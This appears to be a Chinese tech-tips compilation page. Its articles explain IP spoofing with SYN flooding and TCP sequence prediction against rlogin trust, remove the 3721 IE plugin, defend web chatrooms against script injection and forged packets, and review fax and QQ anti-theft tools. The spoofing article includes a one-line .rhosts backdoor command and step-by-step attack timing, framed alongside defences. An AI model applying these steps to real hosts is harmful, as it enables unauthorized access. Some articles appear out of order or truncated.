2 X ＜－－－SYN/ACK－－ B
X ＜－－－SYN/ACK－－ B

3 X ＜－－－ RST －－－ B
　　
在时刻1时，攻击主机把大批SYN 请求发送到受攻击目标（在此阶段，是那个被信任的主机），使其TCP队列充满。在时刻2时，受攻击目标向它所相信的IP地址（虚假的IP）作出SYN/ACK反应。在这一期间，受攻击主机的TCP模块会对所有新的请求予以忽视。不同的TCP 保持连接队列的长度是有所不同的。BSD 一般是5，Linux一般是6。使被信任主机失去处理新连接的能力，所赢得的宝贵空隙时间就是黑客进行攻击目标主机的时间，这使其伪装成被信任主机成为可能。


序列号取样和猜测
前面已经提到，要对目标主机进行攻击，必须知道目标主机使用的数据包序列号。现在，我们来讨论黑客是如何进行预测的。他们先与被攻击主机的一个端口（SMTP是一个很好的选择）建立起正常的连接。通常，这个过程被重复若干次，并将目标主机最后所发送的ISN存储起来。黑客还需要估计他的主机与被信任主机之间的RTT时间（往返时间），这个RTT时间是通过多次统计平均求出的。RTT 对于估计下一个ISN是非常重要的。前面已经提到每秒钟ISN增加128000，每次连接增加64000。现在就不难估计出ISN的大小了，它是128000乘以RTT的一半，如果此时目标主机刚刚建立过一个连接，那么再加上一个64000。再估计出ISN大小后，立即就开始进行攻击。当黑客的虚假TCP数据包进入目标主机时，根据估计的准确度不同，会发生不同的情况：

如果估计的序列号是准确的，进入的数据将被放置在接收缓冲器以供使用。
如果估计的序列号小于期待的数字，那么将被放弃。
如果估计的序列号大于期待的数字，并且在滑动窗口（前面讲的缓冲）之内，那么，该数据被认为是一个未来的数据，TCP模块将等待其它缺少的数据。
如果估计的序列号大于期待的数字，并且不在滑动窗口（前面讲的缓冲）之内，那么，TCP将会放弃该数据并返回一个期望获得的数据序列号。下面将要提到，黑客的主机并不能收到返回的数据序列号。


1 Z（B） --－－SYN －－－> A
2 B ＜－－－SYN/ACK－－－ A
3 Z（B） --－－－ACK－－－＞ A
4 Z（B） －－－——PSH－－－＞ A

攻击者伪装成被信任主机的IP 地址，此时，该主机仍然处在停顿状态（前面讲的丧失处理能力），然后向目标主机的513端口(rlogin的端口号)发送连接请求，如时刻1所示。在时刻2，目标主机对连接请求作出反应，发送SYN/ACK数据包给被信任主机（如果被信任主机处于正常工作状态，那么会认为是错误并立即向目标主机返回RST数据包，但此时它处于停顿状态）。按照计划，被信任主机会抛弃该SYN/ACK数据包。然后在时刻3，攻击者向目标主机发送ACK数据包，该ACK使用前面估计的序列号加1（因为是在确认）。如果攻击者估计正确的话，目标主机将会接收该ACK 。至此，连接正式建立起来了。在时刻4，将开始数据传输。一般地，攻击者将在系统中放置一个后门，以便侵入。经常会使用 ′cat ＋＋ >> ～/.rhosts′。之所以这样是因为，这个办法迅速、简单地为下一次侵入铺平了道路。

一个和这种TCP序列号攻击相似的方法，是使用NETSTAT服务。在这个攻击中，入侵者模拟一个主机关机了。如果目标主机上有NETSTAT，它能提供在另一端口上的必须的序列号。这取消了所有要猜测的需要。

典型攻击工具和攻击过程:hunt
　
防止的要点在于，这种攻击的关键是相对粗糙的初始序列号变量在Berkeley系统中的改变速度  
 
。TCP协议需要这个变量每秒要增加25000次。Berkeley 使用的是相对比较慢的速度。但是，最重要的是，是改变间隔，而不是速度。

我们考虑一下一个计数器工作在250000Hz时是否有帮助。我们先忽略其他发生的连接，仅仅考虑这个计数器以固定的频率改变。

为了知道当前的序列号，发送一个SYN包，收到一个回复：
X---S: SYN(ISN X )
S---X: SYN(ISN S ) ,ACK(ISN X ) (1)
第一个欺骗包，它触发下一个序列号，能立即跟随服务器对这个包的反应：
X---S: SYN(ISN X ) ,SRC = T (2)
序列号ISN S用于回应了：
S---T: SYN(ISN S ) ,ACK(ISN X )
是由第一个消息和服务器接收的消息唯一决定。这个号码是X和S的往返精确的时间。这样，如果欺骗能精确地测量和产生这个时间，即使是一个4-U时钟都不能击退这次攻击。


抛弃基于地址的信任策略
阻止这类攻击的一种非常容易的办法就是放弃以地址为基础的验证。不允许r＊类远程调用命令的使用；删除.rhosts 文件；清空/etc/hosts.equiv 文件。这将迫使所有用户使用其它远程通信手段，如telnet、ssh、skey等等。


进行包过滤
如果您的网络是通过路由器接入Internet 的，那么可以利用您的路由器来进行包过滤。确信只有您的内部LAN可以使用信任关系，而内部LAN上的主机对于LAN以外的主机要慎重处理。您的路由器可以帮助您过滤掉所有来自于外部而希望与内部建立连接的请求。


使用加密方法
阻止IP欺骗的另一种明显的方法是在通信时要求加密传输和验证。当有多种手段并存时，可能加密方法最为适用。


使用随机化的初始序列号
黑客攻击得以成功实现的一个很重要的因素就是，序列号不是随机选择的或者随机增加的。Bellovin 描述了一种弥补TCP不足的方法，就是分割序列号空间。每一个连接将有自己独立的序列号空间。序列号将仍然按照以前的方式增加，但是在这些序列号空间中没有明显的关系。可以通过下列公式来说明：

ISN =M＋F（localhost，localport ，remotehost ，remoteport ）
M：4微秒定时器
F：加密HASH函数。

F产生的序列号，对于外部来说是不应该能够被计算出或者被猜测出的。Bellovin 建议F是一个结合连接标识符和特殊矢量（随机数，基于启动时间的密码）的HASH函数。

★点击进入→免费实用电脑技术及维修总汇→(推荐) 

出处:互联网

IP欺骗技术介绍(1)


即使是很好的实现了TCP/IP协议，由于它本身有着一些不安全的地方，从而可以对TCP/IP网络进行攻击  
 
。这些攻击包括序列号欺骗，路由攻击，源地址欺骗和授权欺骗。本文除了介绍IP欺骗攻击方法外，还介绍怎样防止这个攻击手段。

上述攻击是建立在攻击者的计算机（包括路由）是连在INTERNET上的。这里的攻击方法是针对TCP/IP本身的缺陷的，而不是某一具体的实现。

实际上，IP 欺骗不是进攻的结果，而是进攻的手段。进攻实际上是信任关系的破坏。


IP欺骗原理


信任关系
在Unix 领域中，信任关系能够很容易得到。假如在主机A和B上各有一个帐户，在使用当中会发现，在主机A上使用时需要输入在A上的相应帐户，在主机B上使用时必须输入在B上的帐户，主机A和B把你当作两个互不相关的用户，显然有些不便。为了减少这种不便，可以在主机A和主机B中建立起两个帐户的相互信任关系。在主机A和主机B上你的home目录中创建.rhosts 文件。从主机A上，在你的home目录中输入'echo " B username " ＞ ～/.rhosts' ；从主机B上，在你的home目录中输入'echo " A username " ＞～/.rhosts' 。至此，你能毫无阻碍地使用任何以r＊开头的远程调用命令,如：rlogin，rcall，rsh等，而无口令验证的烦恼。这些命令将允许以地址为基础的验证，或者允许或者拒绝以IP地址为基础的存取服务。

这里的信任关系是基于IP地址的。


Rlogin
Rlogin 是一个简单的客户/服务器程序，它利用TCP传输。Rlogin 允许用户从一台主机登录到另一台主机上，并且，如果目标主机信任它，Rlogin 将允许在不应答口令的情况下使用目标主机上的资源。安全验证完全是基于源主机的IP 地址。因此，根据以上所举的例子，我们能利用Rlogin 来从B远程登录到A，而且不会被提示输入口令。


TCP 序列号预测
IP只是发送数据包，并且保证它的完整性。如果不能收到完整的IP数据包，IP会向源地址发送一个ICMP 错误信息，希望重新处理。然而这个包也可能丢失。由于IP是非面向连接的，所以不保持任何连接状态的信息。每个IP数据包被松散地发送出去，而不关心前一个和后一个数据包的情况。由此看出，可以对IP堆栈进行修改，在源地址和目的地址中放入任意满足要求的IP地址，也就是说，提供虚假的IP地址。

TCP提供可靠传输。可靠性是由数据包中的多位控制字来提供的，其中最重要的是数据序列和数据确认，分别用SYN和ACK来表示。TCP 向每一个数据字节分配一个序列号，并且可以向已成功接收的、源地址所发送的数据包表示确认（目的地址ACK 所确认的数据包序列是源地址的数据包序列，而不是自己发送的数据包序列）。ACK在确认的同时，还携带了下一个期望获得的数据序列号。显然，TCP提供的这种可靠性相对于IP来说更难于愚弄。


序列编号、确认和其它标志信息
由于TCP是基于可靠性的，它能够提供处理数据包丢失，重复或是顺序紊乱等不良情况的机制。实际上，通过向所传送出的所有字节分配序列编号，并且期待接收端对发送端所发出的数据提供收讫确认，TCP 就能保证可靠的传送。接收端利用序列号确保数据的先后顺序，除去重复的数据包。TCP 序列编号可以看作是32位的计数器。它们从0至2^32－1 排列。每一个TCP连接（由一定的标示位来表示）交换的数据都是顺序编号的。在TCP数据包中定义序列号（SYN）的标示位位于数据段的前端。确认位（ACK）对所接收的数据进行确认，并且指出下一个期待接收的数据序列号。

TCP通过滑动窗口的概念来进行流量控制。设想在发送端发送数据的速度很快而接收端接收速度却很慢的情况下，为了保证数据不丢失，显然需要进行流量控制，协调好通信双方的工作节奏。所谓滑动窗口，可以理解成接收端所能提供的缓冲区大小。TCP利用一个滑动的窗口来告诉发送端对它所发送的数据能提供多大的缓冲区。由于窗口由16位bit所定义，所以接收端TCP 能最大提供65535个字节的缓冲。由此，可以利用窗口大小和第一个数据的序列号计算出最大可接收的数据序列号。

其它TCP标示位有RST（连接复位，Reset the connection）、PSH（压入功能，Push function）和FIN （发送者无数据，No more data from sender）。如果RST 被接收，TCP连接将立即断开。RST 通常在接收端接收到一个与当前连接不相关的数据包时被发送。有些时候，TCP模块需要立即传送数据而不能等整段都充满时再传。一个高层的进程将会触发在TCP头部的PSH标示，并且告诉TCP模块立即将所有排列好的数据发给数据接收端。FIN 表示一个应用连接结束。当接收端接收到FIN时，确认它，认为将接收不到任何数据了。

TCP序列号预测最早是由Morris对这一安全漏洞进行阐述的。他使用TCP序列号预测，即使是没有从服务器得到任何响应， 来产生一个TCP包序列。这使得他能欺骗在本地网络上的主机。

通常TCP连接建立一个包括3次握手的序列。客户选择和传输一个初始的序列号（SEQ标志）ISN C，并设置标志位SYN=１，告诉服务器它需要建立连接。服务器确认这个传输，并发送它本身的序列号ISN S，并设置标志位ACK，同时告知下一个期待获得的数据序列号是ISN=1。客户再确认它。在这三次确认后，开始传输数据。整个过程如下所示：(C:Client S:Server)
C---S: SYN(ISN C )
S---C: SYN(ISN S ) ,ACK(ISN C )
C---S: ACK(ISN S )
C---S:数据 或S---C:数据

也就是说对一个会话，C必须得到ISN S确认。ISN S可能是一个随机数。

了解序数编号如何选择初始序列号和如何根据时间变化是很重要的。似乎应该有这种情况，当主机启动后序列编号初始化为1，但实际上并非如此。初始序列号是由tcp_init函数确定的。ISN每秒增加128000，如果有连接出现，每次连接将把计数器的数值增加64000。很显然，这使得用于表示ISN的32位计数器在没有连接的情况下每9.32 小时复位一次。之所以这样，是因为这样有利于最大限度地减少旧有连接的信息干扰当前连接的机会。这里运用了2MSL 等待时间的概念（不在本文讨论的范围之内）。如果初始序列号是随意选择的，那么不能保证现有序列号是不同于先前的。假设有这样一种情况，在一个路由回路中的数据包最终跳出了循环，回到了“旧有”的连接（此时其实是不同于前者的现有连接），显然会发生对现有连接的干扰。

假设一个入侵者X有一种方法，能预测ISN S。在这种情况下，他可能将下列序号送给主机T来模拟客户的真正的ISN S：
X---S: SYN(ISN X ) ,SRC = T
S---T: SYN(ISN S ) ,ACK(ISN X )
X---S: ACK(ISN S ) ,SRC =T

尽管消息S*T并不到X，但是X能知道它的内容，因此能发送数据。如果X要对一个连接实施攻击，这个连接允许执行命令，那么另外的命令也能执行。

那么怎样产生随机的ISN？在Berkeley系统，最初的序列号变量由一个常数每秒加一产生，等到这个常数一半时，就开始一次连接。这样，如果开始了一个合法连接，并观察到一个ISN S在用，便可以计算，有很高可信度，ISN S 用在下一个连接企图。

Morris 指出，回复消息
S---T:SYN(ISN S ) ,ACK(ISN X )
事实上并不消失，真正主机将收到它，并试图重新连接。这并不是一个严重的障碍。

Morris发现，通过模仿一个在T上的端口，并向那个端口请求一个连接，他就能产生序列溢出，从而让它看上去S*T消息丢失了。另外一个方法，可以等待知道T关机或重新启动。

IP欺骗
IP欺骗由若干步骤组成，这里先简要地描述一下，随后再做详尽地解释  
 
。先做以下假定：首先，目标主机已经选定。其次，信任模式已被发现，并找到了一个被目标主机信任的主机。黑客为了进行IP欺骗，进行以下工作：使得被信任的主机丧失工作能力，同时采样目标主机发出的TCP 序列号，猜测出它的数据序列号。然后，伪装成被信任的主机，同时建立起与目标主机基于地址验证的应用连接。如果成功，黑客可以使用一种简单的命令放置一个系统后门，以进行非授权操作。


使被信任主机丧失工作能力
一旦发现被信任的主机，为了伪装成它，往往使其丧失工作能力。由于攻击者将要代替真正的被信任主机，他必须确保真正被信任的主机不能接收到任何有效的网络数据，否则将会被揭穿。有许多方法可以做到这些。这里介绍“TCP SYN 淹没”。

前面已经谈到，建立TCP连接的第一步就是客户端向服务器发送SYN请求。 通常，服务器将向客户端发送SYN/ACK 信号。这里客户端是由IP地址确定的。客户端随后向服务器发送ACK，然后数据传输就可以进行了。然而，TCP处理模块有一个处理并行SYN请求的最上限，它可以看作是存放多条连接的队列长度。其中，连接数目包括了那些三步握手法没有最终完成的连接，也包括了那些已成功完成握手，但还没有被应用程序所调用的连接。如果达到队列的最上限，TCP将拒绝所有连接请求，直至处理了部分连接链路。因此，这里是有机可乘的。

黑客往往向被进攻目标的TCP端口发送大量SYN请求，这些请求的源地址是使用一个合法的但是虚假的IP地址（可能使用该合法IP地址的主机没有开机）。而受攻击的主机往往是会向该IP地址发送响应的，但可惜是杳无音信。与此同时IP包会通知受攻击主机的TCP：该主机不可到达，但不幸的是TCP会认为是一种暂时错误，并继续尝试连接（比如继续对该IP地址进行路由，发出SYN/ACK数据包等等），直至确信无法连接。

★点击进入→免费实用电脑技术及维修总汇→(推荐) 

作者：邱腾（chutium）

较早前发表于 http://www.yesky.com/

最近浏览一些门户网站时，会不知不觉的被安装上一个名为“3721网络实名”的
IE插件。虽说这些门户网站和3721本是好意，可是这样单方面地安装上这么一个
插件有点不妥！之所以说它是病毒，因为它同样是开机自动启动，而且虽然带来
一些方便，但是使系统运行的极不稳定，拖慢上网速度。在s8s8.net的论坛上看
到很多网友都说关机时经常会出现 explorer.exe 出错的提示。我也是同样深受
其害，仔细研究了一下，问题就出在这个“3721网络实名”上！更可气的是，可
能是由于程序做的比较仓促，完全没有卸载功能！

这里附上它的源代码，通过代码可以看出这不是木马。不过程序写的很烂……

#include "windows.h"
#include "winbase.h"
 
void main()
{
 char buf[MAX_PATH];
 ::ZeroMemory(buf, MAX_PATH);
 ::GetWindowsDirectory(buf, MAX_PATH);
 char filename[MAX_PATH];
 ::ZeroMemory(filename, MAX_PATH);
 strcpy(filename, buf);
 strcat(filename, "\\Downloaded Program Files\\CnsMinIO.dll");
 ::MoveFileEx(filename, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
 ::ZeroMemory(filename, MAX_PATH);
 strcpy(filename, buf);
 strcat(filename, "\\Downloaded Program Files\\CnsMin.dll");
 ::MoveFileEx(filename, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
 ::ZeroMemory(filename, MAX_PATH);
 strcpy(filename, buf);
 strcat(filename, "\\Downloaded Program Files\\cnsio.dll");
 ::MoveFileEx(filename, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
}

下面将给大家卸载这个插件的详细过程。

由于这个3721网络实名插件是使用Rundll32.exe调用连接库的，系统无法终止
Rundll32.exe进程，所以我们必须重新启动计算机，按 F8 进入安全模式
（F8 只能按一次，千万不要多按！）

之后，单击 开始 -> 运行 regedit.exe 打开注册表，进入：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除键：CnsMin
其键值为：Rundll32.exe C:\WINNT\DOWNLO~1\CnsMin.dll,Rundll32
（如果是win98，这里的 C:\WINNT\DOWNLO~1\ 为 C:\WINDOWS\DOWNLO~1\）

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\
删除整个目录：!CNS
这个目录在 Internet 选项 -> 高级 中加入了3721网络实名的选项。

HKEY_LOCAL_MACHINE\SOFTWARE\3721\ 以及 HKEY_CURRENT_USER\Software\3721\
删除整个目录：3721
注：如果您安装了3721的其它软件，如 极品飞猫 等，则应删除
整个目录：HKEY_LOCAL_MACHINE\SOFTWARE\3721\CnsMin
　　以及　HKEY_CURRENT_USER\Software\3721\CnsMin

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\
删除键：CNSEnable 其键值为：a2c39d5f
删除键：CNSHint  其键值为：a2c39d5f
删除键：CNSList  其键值为：a2c39d5f

在删除完注册表中的项之后，还需要删除存储在硬盘中的3721网络实名文件。

删除如下文件：

C:\WINNT\DOWNLO~1 目录下
（这里的 C:\WINNT\DOWNLO~1\ 为 C:\WINDOWS\DOWNLO~1\ 下同）

2001-08-09  15:34       <DIR>          3721
2001-08-02  17:03               40,960 cnsio.dll
2001-08-08  14:14              102,400 CnsMin.dll
2001-08-24  23:14                   42 CnsMin.ini
2001-08-09  10:18               13,848 CnsMinEx.cab
2001-07-06  17:57               32,768 CnsMinEx.dll
2001-08-25  02:52                  115 CnsMinEx.ini
2001-08-25  02:51               17,945 CnsMinIO.cab
2001-08-02  17:02               32,768 CnsMinIO.dll
2001-08-24  23:15               40,793 CnsMinUp.cab

C:\WINNT\DOWNLO~1\3721 目录下

2001-08-02  17:03               40,960 cnsio.dll
2001-08-24  15:53              102,400 CnsMin.dll
2001-07-06  17:59                  213 CnsMin.inf
2001-08-24  15:48               28,672 CnsMinIO.dll

以上文件全部删除，这样3721网络实名“病毒”就从您的计算机中全部清除了。

最后，重新启动计算机，进入正常模式。现在已经完全没有3721网络实名的捆饶了！

★点击进入→免费实用电脑技术及维修总汇→(推荐) 

出处:互联网

一、简介

随着Internet的普及和发展，网络这块净土也被黑客盯上而屡屡出现一些风波，比如重要网站被黑、商务站点受到影响等等，这些事例都是数不胜举。虽然这些事情和我们普通老百 姓都是相距甚远的，但还是给网友们带来了不便，要想有效的防护自己的，首先就要知晓对方会采取何种破坏和攻击手段。

实际上存在着许多的聊天工具，比如可以通过V2登入到BBS进行聊天，也可以通过IRC协议进行及时的聊天,比如象ICQ、MSN和国内的OICQ软件都属于这种形式的聊天。

各种聊天工具都有它们自己的优缺点，比如IRC协议因为是完全基于字符的，所以速度比较快。还有网站的聊天，该聊天系统的特点是用户注册登入以后，把用户浏览页面的情况实时的发送到相关的服务器上，这样，所有在同一个网站上面的用户就可以实时的进行沟通。基于Web的聊天服务器系统的最大的优点是完全基于浏览器和Web服务器的，所以用户不需要任何其他的客户端的工具，而且由于浏览器完全支持多媒体形式，所以传输的内容可以非常丰富多彩。

二、聊天室存在的攻击行为

我们知道浏览器实际上除了和Web服务器进行消息的传送以外，还负责对服务器发送回来的HTML页面进行解析，而现在几乎所有的浏览器都支持JavaScript，这样如果用户在发送信息的时候，不是发送正常的文本而是一些带标记的HTML语言甚至是JavaScript的时候，如果这些语句又是一些恶意的程序代码，就会对用户造成损害。

另外，用户可以通过代理截获所有发送和接收的数据包，通过自己编写的应用程序不停的向服务器发送类似格式的数据包使服务器不能处理其他用户的信息包，能够这样做的原因是因为浏览器和Web服务器通讯并不是通过一个固定的Socket连接进行的，服务器端实际上只是判别数据包本身的合法性，并不判断数据包是从哪个IP地址和哪个Port端口发送的。而浏览器是每次发送数据包的时候和服务器建立一个Socket连接，当该次传送完成后连接就会断开。

现在基于Web的聊天室有一般有两种形式：一种是需要用户认证的，即用户在登入服务器以前必须进行注册，一种是不需要认证的，即用户只需要用一个Nickname就可以登入到聊天室中，只要该聊天室中还不存在这个NickName就可以了。关于用户的消息处理，现在几乎所有的聊天室都关闭了对HTML和Javascript的支持，或者是仅仅允许一部分用户（比如聊天室的系统管理员等）使用这些功能。

三、需要注意的问题和防范

由于OICQ是用户间的直接连接，所以很容易被查出IP地址而受到攻击，在解决了单机上的安全问题之后，我们面对的将是如何在网络上进行防护。

首先，建议大家要安装防火墙程序。

目前比较好的防火墙有LockDown 2000、ZoneAlarm和天网等等，这些工具都有汉化的版本，因此使用方面应该是没有太大的问题。如果在这些防火墙程序中将安全等级设置为“高”的话，它们就会对网络上发送和接收的每一个字节进行监测，同时也会对指定的端口进行实时的查看，一旦发现有非正常的数据包企图进入计算机系统，它们就会加以拦截。
关于信息长度的限制：

一般来说，在服务器发送给浏览器端的HTML中含有的JavaScript会对用户输入的信息做检查，防止信息超过一定的长度，但是实际上用户可以不通过浏览器，自己生成数据包发送到服务器端，所以为了防止用户发送过长的数据包，需要在服务器端检查用户的数据包的长度。当然这里同时需要注意的是要在用户登入的时候在服务器端检查用户名称和密码的最大长度，同时如果设定了用户性别的话，也要设定其长度限制，事实上如果用户是通过浏览器方式的话，因为在服务器发送给客户的HTML文本中已经通过JavaScript剧本做了限定，一般不会有问题，但是要考虑用户通过自己合成数据包发送类似信息所产生的问题。

数据包内容的判断：

因为恶意用户可能会在发送的信息中含有恶意的JavaScript代码或者是HTML代码，如果这样的信息包在服务器端不经过处理而直接传送到其他用户的浏览器上的话，就会造成其他用户的浏览器不停的打开新的窗口，直到耗尽系统的资源。其他的比如发送特大的图象或者是其他的多媒体文件到指定的客户端就会对该客户端用户造成不良的影响。所以一般我们需要对用户发送的信息进行处理，屏蔽这些HTML语句和Javascript语句。因为所有的命令都是包含在“<>”里面的，所以最简单的方法就是当服务器接收到“<>”字符的时候，只把“<>”看成是普通的字符而不是命令的标志符，就可以避免这个问题。当然为了增加聊天的趣味性，可以对某一些可信任的用户开放这些功能。

用户身份的鉴别：

很多聊天室在传送数据包的时候，只是根据网页中隐含的字段得到用户的名称作为用户的标识来发送信息。比如国内比较典型的聊天站点(www.XXXXX.net)的用户的发送信息的数据包的格式是这样的：GEhttp://chat.XXXXX.net/BANNER?USER=username&;
SAYS=%3Ch2%3Ethis+is+test%3C%2Fh2%3E&IMG=&IMGURL=&
WHOTO=%CB%F9%D3%D0%C8% CB&ACTION=%CB%B5%BB%B0&as=on&msg=HTTP/1.0 其中username就是表示该数据包是这个用户发送的。这样我们就很容易自己构建一个类似的数据包，而把用户名称替换成其他任何我们想要替换的人的名称，这样聊天室中的信息就会变得比较混乱，搞不清楚消息到底是谁发送的。

为了避免这个问题，我们的解决方案是这样的，当用户首次登入的时候，服务器系统应该生成一个唯一的sessionID来标识这个用户，这样，每次用户发送的数据包中必须包括这个sessionID，服务器根据这个sessionID来识别是否是该用户发送的消息，如果是一个不合法的sessionID的话，就简单的丢弃这个数据包。因为sessionID是在服务器端随机生成的，所以用户很难自己构造一个合法的sessionID来欺骗服务器，保证了信息来源的可靠性。当然如果服务器需要用户首先注册的话，可以同时检查用户的密码和sessionID是否匹配，这样用户伪造其他用户的信息的可能性就会更小。

关于用户发送重复的信息和自动循环发送随机信息（即通常所说的聊天室刷屏现象）的处理：

如果用户只是通过浏览器操作的话，服务器传送给用户的HTML文本中包含的Javascript就会在用户发送消息的时候比较用户的本次信息是否和上次信息相一致，如果是相一致的话，系统就不会发送本次信息并给出警告。而且如果用户是在浏览器上进行操作的话，用户的信息发送间隔会受到手工操作的限制。但是，如果用户是通过自己的应用程序发送数据包的话，就不会有这个限制。实际上用户可以在一个线程中不断对服务器循环发送数据包。所以系统不仅要考虑在客户端有这个限制，还需要在服务器端进行限制。

我们的解决方案是这样的，对所有在线的用户，我们建立了一个用户池，它实际上是一个用户对象的链表，每一个用户对象包含了用户的名称，用户的sessionID，用户的上一句发言的信息和用户上一句发言的时间。实际上这个用户池也是滚动的，如果用户在最近一段时间内没有任何信息，我们就认为该用户已经不在线上，就从信息池中删除该用户，以便为其他用户的连接让出资源。如果用户发送的消息和上一次消息相同的话，就简单的丢弃用户的这个数据包，如果用户这次消息的发送时间和上一次时间间隔小于一定范围（比如一秒）的话，我们就认为这种数据发送速率是非正常的，就简单的从用户池中删除这个用户，断掉这个连接。通过这种解决方法有效的解决了用户刷屏和发送重复消息的问题。

四、小结

本文介绍了Internet的聊天系统和不同的特点，重点介绍了聊天室存在的问题和一些攻击行为的防范，虽然黑客猖獗，不过胜利始终是属于正义一方的。
（出处：小凤居）

★点击进入→免费实用电脑技术及维修总汇→(推荐) 

出处:互联网

随着信息时代对人们快节奏工作的要求，传真机已成为日常办公不可或缺的重要工具。但目前国内的长途通讯费用之高，往往令人望而却步。如果你经常要往外地或是国外发送传真的话，那一个月下来的费用更是吃不消。该怎样才能省下这一大笔开支呢？笔者在此向大家推荐“免费传真之星”这款小软件，使用它，可以快捷有效地利用互联网免费传真服务，除了交付网络费用外，甚至连传统传真机所必须的耗材纸张也免了，可谓一举多得。

    1． 安装注意事项

图3

    4． 发送

    以上步骤设置好之后，按下“发送”按钮即可发送传真。之后半小时左右将收到服务器给你的确认E-mail，这是确认传真是否发送成功的重要信息。如果发送成功，你之前设置的信箱会收到两封E-mail，第一封提示服务器已收到你的传真，第二封提示服务器已把传真发到你所指定的传真机上。如果未收到第二封，则说明传真发送失败（出处：中国电脑教育报）

★点击进入→免费实用电脑技术及维修总汇→(推荐) 

出处:互联网

QQ现在已成为网上寻呼和聊天的代名词了，凡上网者大都有QQ号码，也肯定用QQ结交了不少网友。可是在网吧用QQ时常常会发生号码被盗的情况，自己的QQ号码一瞬间就成为别人的了。QQ号丢了还能申请新的，虽然申请很简单便捷，可是自己的QQ好友列表就很难找回来了。即使我们申请了QQ密码保护，能够找回QQ密码来，也会发现自己许多的QQ好友都被盗号者删掉了。每次到网吧上网你是否都提心吊胆？向你介绍个好工具——“QQ密码防盗专家”。
  一、软件的功能
“QQ密码防盗专家”(以下简称为QQPC)是一款保护QQ密码的利器，其主要功能有：
1.可以自己定义QQ标题，设定QQ标题改变的时间间隔，最大限度地保护QQ的安全。
2.自动关闭QQ广告，包括无线QQ使用向导广告、腾讯QQ系统广播、腾讯Flash广告、发送消息框内的动画广告以及IE浏览器弹出的广告窗口。
3.防止一些最新版的QQ盗密软件在你修改新密码时把你的QQ新密码记录下来，能够隐藏或伪装你的QQ号，能够禁止QQ收发消息、禁止文件下载、禁用注册表、禁止文件及目录删除等。
4.QQ防盗补丁能够防止一切网页代码自动下载QQ病毒及修改系统注册表，并有QQ病毒清除方法。能够自动识别并提示该窗体是属于新版QQ、旧版QQ还是伪装QQ界面的木马，并能自身隐藏。
5.去掉QQ浏览器并还原成IE浏览器打开网页，能隐藏QQ注册向导只允许指定号码登录QQ。修改QQ内核，并且能够设定QQ自动登录键，彻底防止键盘及鼠标记录软件对QQ密码的记录。
6.密码取回功能，能够取回已忘记的密码，并且有QQ何时登录及登录时使用的是QQ用户界面还是QQ注册向导界面等记录。
7.能够清除QQ用户列表中的历史记录，防盗功能全面适应珊瑚虫工作室修改的各类QQ版本。
8.聊天记录截取功能，能记下在本机使用过的所有QQ聊天记录，以备查阅；还有QQ自动聊天功能。能够帮你自动聊天，用户可以自定义语句，支持最新版的QQ。
二、QQ盗密原理
所有QQ盗密软件都有一个共同点，就是通过判断当前Windows窗口中有没有名为“QQ用户登录”或“QQ注册向导”字样的标题，如果有则认为是QQ密码登录界面，盗密软件就采取实时监控方式截取QQ密码，在输入密码的过程中，盗密软件仍然在判断当前的窗口是否还是以前的QQ标题，如果不是则表明当前用户已经把密码输入完毕，并登录到下一个窗口了。在这一刹那，QQ盗密软件就会把密码截取到，然后发送到QQ盗密者的邮箱中。
知道了QQ盗密原理以后，我们就不难想出对付它们的办法了。只要破坏QQ盗密软件的必备条件———QQ标题，就能以一变应万变打击QQ盗密软件了。QQPC正是采用QQ标题实时变动的方法来达到保护QQ密码目的的。
三、防盗设置
1.动态改变窗体标题
QQPC运行后，显示“主窗体”界面，主窗口有3个QQ变动标题，一旦发现你的QQ窗口被打开，它就会马上用这三个新QQ标题轮流替换。你可以随意更改它们，也可以设置标题替换的时间间隔。
一旦QQ窗口被发现后，你会看见QQ程序标题在不停闪烁，而且QQPC主窗口左上的那个灰暗的男孩QQ头像也会变亮，并且自动闪烁，下边的那个红色“0”会自动加1，表示已经检测到一个QQ窗口，并正在进行实时修改了。新版的QQPC还能修改QQ内部窗体的标题，这时你就可以放心使用QQ，不怕被盗了。
如果你打开一个QQ，正准备登录时，却发现QQ标题变成了“警告：你已经中了QQ木马程序！。。。。”，同时，QQPC主窗口的“伪装QQ界面木马”数由原来的“0”增加了1，那么表明你的电脑很可能中了QQ界面伪装类木马的毒。此时你最好不要使用该程序，到另一台电脑上试试QQ登录。如果你已经输入QQ密码并进行了登录也没有关系，此时要赶快更改QQ密码。当然要在QQPC的监控下进行了，否则又有可能被后台记录键盘的木马窃去密码。每次修改设置后，不要忘了点击“保存”按钮来保存设置。
2.个性化设置
知道了QQPC防止QQ密码被盗的原理后，你也可以发挥自己的想象力，把某些要输入密码的程序标题改为自己设置的标题，也能起到防盗的作用。同时，如果设置了“关闭该窗口程序”功能，还能起到禁止打开该程序的作用！
如：把“检测到的程序窗口标题”内容改为“确认文件删除”(在删除文件时会出现这个删除对话框)，在“发现该标题后的处理方式”中选“关闭该窗口程序”，这样就能起到防止文件被删除的作用。你也可以把登录后的QQ号标题改成其它的QQ号，这样在网吧上网就可以起到隐藏QQ号的作用。
3.QQ密码防盗补丁
你肯定有过IE注册表被网页恶意代码修改过的经历吧，最近还出现了一种一打开网页就能自动下载QQ木马并运行的病毒———爱情森林，中了该病毒后将自动发送消息给其他网友，其他网友看了消息中链接的网页后也会中这种病毒。
你会采取何种措施来保护自己的QQ及IE注册表不再被破坏呢？是备份注册表文件？用软件免疫？还是禁用js代码？显然这些方法都不太理想，其实你只要使用QQPC修复一下IE的漏洞，那么以后碰到网页恶意代码，就再也不用担心注册表会再被网页修改了。
4.内核修改
为了防止最新盗密软件对QQ界面中的“回车键”及“鼠标按键”进行记录来取得QQ密码，你可以自己设定快捷键(系统默认为用F8键替代回车键)来进行登录，由于用户可以随机设定快捷键进行登录，故可绕过盗密软件对“回车键”或“鼠标按键”的检测。
在输入完成密码之后，按F8键完成QQ的登录。此时一定不要按回车键或点击鼠标完成登录，否则密码仍会被盗。
5.取回密码
如果你把QQ密码忘了，可使用“取回密码”功能把密码取回来，但为了防止他人随意取回密码，且取回的可能不是自己的用户密码，所以取得密码中的前两位数均用“”号代替。不过该功能只有注册用户才能使用，在此就不多说了。
祝您能用QQ开开心心聊天，安安全全上网！（出处：TOM 科技）

